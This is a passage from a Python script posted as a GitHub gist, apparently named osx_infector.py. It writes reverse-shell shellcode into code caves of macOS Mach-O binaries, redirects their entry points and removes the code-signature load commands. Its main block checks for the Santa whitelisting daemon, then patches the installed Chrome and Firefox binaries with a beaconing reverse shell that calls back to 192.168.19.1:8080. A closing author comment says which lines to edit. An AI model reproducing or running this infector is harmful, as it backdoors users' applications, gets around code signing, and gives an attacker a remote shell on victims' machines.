newOffset = struct.unpack("<I", text_section['Offset'])[0] - len(self.shellcode)
bin.write(struct.pack("<I", newOffset))
if LC_UNIXTREAD != {}:
bin.seek(LC_UNIXTREAD['LOCrip'], 0)
bin.write(struct.pack("<Q", newAddress))
elif LC_MAIN != {}:
bin.seek(LC_MAIN["LOCEntryOffset"], 0)
bin.write(struct.pack("<Q", newOffset))
elif MagicNumber == '0xfeedface' and patchx86 is True:
print "[*] Patching x86 (i386) Mach-O Binary"
cave_size = struct.unpack("<I", text_section['Offset'])[0] + offset - last_cmd
print "[*] Pre-text section 'code cave' size:", hex(cave_size)
resultShell = self.set_shells(MagicNumber)
if not resultShell:
print "[!] Could not set shell"
return False
if len(self.shellcode) > cave_size:
print "[!] Shellcode is larger than available space"
return False
#FIND Current Location
startingLocation = struct.unpack("<I", text_section['Offset'])[0] + offset - len(self.shellcode)
if LC_UNIXTREAD != {}:
print "[*] ...with LC_UNIXTREAD format"
if struct.unpack("<I", LC_UNIXTREAD['eip'])[0] - struct.unpack("<I", text_section['Address'])[0] != 0x0:
self.jumpLocation = struct.unpack("<I", LC_UNIXTREAD['eip'])[0] - struct.unpack("<I", text_section['Address'])[0]
else:
print "[*] ...with LC_Main format"
if struct.unpack("<Q", LC_MAIN['EntryOffset'])[0] - struct.unpack("<I", text_section['Offset'])[0] != 0x0:
self.jumpLocation = struct.unpack("<Q", LC_MAIN['EntryOffset'])[0] - struct.unpack("<I", text_section['Offset'])[0]
resultShell = self.set_shells(MagicNumber)
if not resultShell:
print "[!] Could not set shell"
return False
bin.seek(startingLocation, 0)
bin.write(self.shellcode)
bin.seek(text_section['LOCAddress'], 0)
newAddress = struct.unpack("<I", text_section['Address'])[0] - len(self.shellcode)
bin.write(struct.pack("<I", newAddress))
newSize = struct.unpack("<I", text_section['Size'])[0] + len(self.shellcode)
bin.write(struct.pack("<I", newSize))
newOffset = struct.unpack("<I", text_section['Offset'])[0] - len(self.shellcode)
bin.write(struct.pack("<I", newOffset))
if LC_UNIXTREAD != {}:
bin.seek(LC_UNIXTREAD['LOCeip'], 0)
bin.write(struct.pack("<I", newAddress))
else:
bin.seek(LC_MAIN["LOCEntryOffset"], 0)
bin.write(struct.pack("<I", newOffset))
else:
print "[!] Not patching this arch:", MagicNumber
continue
if LC_CODE_SIGNATURE != {}:
print "[*] Removing LC_CODE_SIGNATURE command"
bin.seek(self.mach_hdrs[key]['LOCLoadCmds'], 0)
oldNumber = struct.unpack("<I", bin.read(4))[0]
bin.seek(self.mach_hdrs[key]['LOCLoadCmds'], 0)
bin.write(struct.pack("<I", oldNumber - 1))
oldsize = struct.unpack("<I", bin.read(4))[0]
bin.seek(self.mach_hdrs[key]['LOCLoadCmds'] + 4, 0)
bin.write(struct.pack("<I", oldsize - 0x10))
if LC_DYLIB_CODE_SIGN_DRS != {}:
print "[*] Removing LC_DYLIB_CODE_SIGN_DRS command"
bin.seek(self.mach_hdrs[key]['LOCLoadCmds'], 0)
oldNumber = struct.unpack("<I", bin.read(4))[0]
bin.seek(self.mach_hdrs[key]['LOCLoadCmds'], 0)
bin.write(struct.pack("<I", oldNumber - 1))
oldsize = struct.unpack("<I", bin.read(4))[0]
bin.seek(self.mach_hdrs[key]['LOCLoadCmds'] + 4, 0)
bin.write(struct.pack("<I", oldsize - 0x10))
print "[!] Patching Complete"
return True
if __name__ == "__main__":
patchApps = {'/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome':True,
'/Applications/Firefox.app/Contents/MacOS/firefox':True,
}
proclist = subprocess.Popen(['ps', 'ax'], stdout=subprocess.PIPE).stdout.readlines()
santa_exists = False
for proc in proclist:
if 'santad' in proc:
print "[!] Santa exists"
santa_exists = True
for app, whitelistcheck in patchApps.iteritems():
if not os.path.isfile(app):
print app, "is not on the target system"
continue
if santa_exists is True and whitelistcheck is False:
print '[!] Cannot patch %s since whitelisting is enabled' % app
continue
print "\n[-]Patching:", app
try:
supported_file = machobin(app, None, 'beaconing_reverse_shell_tcp', '192.168.19.1', 8080, False, None, 'ALL', True, True)
supported_file.run_this()
except:
pass
@secretsquirrel
Copy link
Author

secretsquirrel commented Jan 20, 2015

Edit lines https://gist.github.com/secretsquirrel/2ba497786027472f98dd#file-osx_infector-py-L909 and
https://gist.github.com/secretsquirrel/2ba497786027472f98dd#file-osx_infector-py-L931

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment